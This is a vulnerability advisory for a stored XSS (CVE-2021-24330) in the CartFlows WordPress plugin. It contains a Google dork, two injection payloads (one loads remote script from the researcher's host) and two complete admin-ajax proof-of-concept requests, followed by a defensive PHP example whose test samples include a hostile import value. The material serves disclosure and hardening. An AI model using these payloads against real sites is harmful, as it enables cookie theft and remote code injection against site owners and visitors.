/*!
 - # VULNERABILITY: Funnel Builder by CartFlows WordPress Plugin <= 1.6.12 - Authenticated Persistent XSS
 - # GOOGLE DORK: inurl:/wp-content/plugins/cartflows/
 - # DATE: 2021-04-26
 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
 - # VENDOR: CartFlows Inc [ https://cartflows.com ]
 - # SOFTWARE VERSION: <= 1.6.12
 - # SOFTWARE LINK: https://wordpress.org/plugins/cartflows/
 - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
 - # CWE: CWE-79
 - # CVE: CVE-2021-24330
*/

### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the Funnel Builder by CartFlows plugin through v1.6.12 for WordPress.

[i] Vulnerable parameter(s): $facebook_settings['facebook_pixel_id'] (cartflows/classes/class-cartflows-tracking.php:64), $google_analytics_settings['google_analytics_id'] (cartflows/classes/class-cartflows-tracking.php:214).

### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]

[$] 'm0ze'); alert(document.cookie); //('m0ze'
[$] ';import("https://m0ze.ru/payload/a2r.js");'

### -- [ PoC #1 | Authenticated Persistent XSS | Facebook Pixel ID: ]

[!]
POST /wp-admin/admin-ajax.php?_locale=user HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------136768928210535225113059586199
Content-Length: 1787

-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking]"

enable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking_for_site]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking_for_site]"

enable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_id]"

'm0ze'); alert(document.cookie); //('m0ze'
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_initiate_checkout]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_add_payment_info]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_purchase_complete]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="action"

cartflows_save_global_settings
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="security"

e918af4728
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="setting_tab"

facebook_pixel
-----------------------------136768928210535225113059586199--

### -- [ PoC #2 | Authenticated Persistent XSS | Google Analytics ID: ]

[!]
POST /wp-admin/admin-ajax.php?_locale=user HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------372833242730857634751324923175
Content-Length: 1814

-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics]"

enable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics_for_site]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[google_analytics_id]"

';import("https://m0ze.ru/payload/a2r.js");'
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_begin_checkout]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_add_to_cart]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_add_payment_info]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_purchase_event]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="action"

cartflows_save_global_settings
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="security"

e918af4728
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="setting_tab"

google_analytics
-----------------------------372833242730857634751324923175--

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
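The Info section names two settings (facebook_pixel_id and google_analytics_id) that are stored by an admin and later printed into an inline tracking script, which is why a value containing quotes and parentheses becomes stored XSS. The PHP below is an added example, not CartFlows code and not the patched plugin: it shows the two layers a maintainer would add, an allow-list check when the setting is saved and JS-literal encoding when it is printed. All function names, the ID regexes and the shape of the inline snippet (modelled on the standard Pixel init call; the plugin's real line 64 is not on the page) are this example's own assumptions, and the sample inputs are constructed.

```php
<?php
// Added example (not CartFlows code): validate tracking IDs on save and
// encode them on output so a stored value cannot break out of a JS string.

/**
 * Facebook Pixel IDs are numeric. Anything else is rejected and the setting
 * is stored empty, so quotes, parentheses and semicolons never reach the DB.
 * Regex length bound is an assumption, not a documented limit.
 */
function cf_example_sanitize_pixel_id(string $raw): string
{
    $value = trim($raw);
    return preg_match('/^[0-9]{1,32}$/', $value) === 1 ? $value : '';
}

/**
 * Google Analytics property IDs follow UA-<digits>-<digits> or G-<alnum>.
 * The exact lengths below are an assumption chosen to be permissive for
 * real IDs while still excluding every non-alphanumeric character.
 */
function cf_example_sanitize_ga_id(string $raw): string
{
    $value = strtoupper(trim($raw));
    $pattern = '/^(UA-[0-9]{4,10}-[0-9]{1,4}|G-[A-Z0-9]{4,16})$/';
    return preg_match($pattern, $value) === 1 ? $value : '';
}

/**
 * Emit a JS string literal for a value that lands inside <script>.
 * The HEX flags turn ' " < > & into \uXXXX escapes, so even a value that
 * somehow bypassed validation cannot close the literal or the script tag.
 */
function cf_example_js_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_UNESCAPED_SLASHES
    );
}

/** Vulnerable pattern described by the advisory: raw setting concatenated into JS. */
function cf_example_vulnerable_snippet(string $pixel_id): string
{
    return "fbq('init', '" . $pixel_id . "');";
}

/** Hardened pattern: validate first, encode second, emit nothing on failure. */
function cf_example_hardened_snippet(string $pixel_id): string
{
    $clean = cf_example_sanitize_pixel_id($pixel_id);
    if ($clean === '') {
        return ''; // do not render the tracker at all for an invalid ID
    }
    return "fbq('init', " . cf_example_js_literal($clean) . ");";
}

// Constructed samples: one benign ID and one quote-breaking value per setting.
$samples = [
    'pixel benign'  => '123456789012345',
    'pixel hostile' => "'); alert(1); //",
    'ga benign'     => 'UA-12345678-1',
    'ga hostile'    => "';import(\"https://attacker.invalid/x.js\");'",
];

foreach ($samples as $label => $raw) {
    $isPixel = strpos($label, 'pixel') === 0;
    $clean   = $isPixel ? cf_example_sanitize_pixel_id($raw) : cf_example_sanitize_ga_id($raw);
    printf("%-14s stored as: %s\n", $label, $clean === '' ? '(rejected)' : $clean);
}

// Side by side: the hostile pixel value as the vulnerable and hardened code would print it.
echo "\nvulnerable: " . cf_example_vulnerable_snippet($samples['pixel hostile']) . "\n";
echo "hardened:   " . (cf_example_hardened_snippet($samples['pixel hostile']) ?: '(nothing emitted)') . "\n";
echo "hardened:   " . cf_example_hardened_snippet($samples['pixel benign']) . "\n";
```

In a WordPress plugin the save-time check belongs in the AJAX handler that receives the form fields shown in the PoCs (or in the sanitize_callback passed to register_setting()), and the output encoding belongs at the point where the inline script is echoed; core offers esc_js() and wp_json_encode() for that step. Validation alone is not enough because the stored value is also rendered, and encoding alone is not enough because a malformed ID should never be accepted from the settings form in the first place.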